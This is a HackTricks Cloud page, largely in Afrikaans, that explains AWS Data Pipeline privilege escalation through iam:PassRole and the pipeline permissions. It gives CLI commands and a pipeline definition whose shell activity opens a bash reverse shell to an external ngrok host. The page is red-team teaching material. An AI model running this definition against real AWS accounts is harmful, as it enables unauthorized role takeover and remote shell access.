AWS - Datapipeline Privesc

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Kyk na die subscription plans!

Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.

Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.

datapipeline

Vir meer inligting oor datapipeline, sien:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

Gebruikers met hierdie permissies kan bevoegdhede eskaleer deur ’n Data Pipeline te skep om arbitrêre opdragte uit te voer met behulp van die permissies van die toegewysde rol:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Na die skep van die pipeline werk die aanvaller die definisie daarvan by om spesifieke aksies of die skepping van hulpbronne te bepaal:

{
"objects": [
{
"id": "CreateDirectory",
"type": "ShellCommandActivity",
"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn": { "ref": "instance" }
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id": "instance",
"name": "instance",
"type": "Ec2Resource",
"actionOnTaskFailure": "terminate",
"actionOnResourceFailure": "retryAll",
"maximumRetries": "1",
"instanceType": "t2.micro",
"securityGroups": ["default"],
"role": "assumable_datapipeline",
"resourceRole": "assumable_ec2_profile_instance"
}
]
}

Note

Let wel dat die role in reël 14, 15 en 27 ’n role moet wees assumable by datapipeline.amazonaws.com en die role in reël 28 ’n role assumable by ec2.amazonaws.com with a EC2 profile instance moet wees.

Boonop sal die EC2 instance slegs toegang hê tot die role assumable by the EC2 instance (dus kan jy slegs daardie een steel).

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

Die pipeline-definisielêer, deur die aanvaller opgestel, bevat instruksies om opdragte uit te voer of hulpbronne te skep via die AWS API, en maak gebruik van Data Pipeline se rolpermissies om moontlik addisionele voorregte te bekom.

Potensiële impak: Direkte privesc na die gespesifiseerde ec2 service role.

Verwysings

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Kyk na die subscription plans!

Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.

Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.

HackTricks Cloud

AWS - Datapipeline Privesc

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Verwysings

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`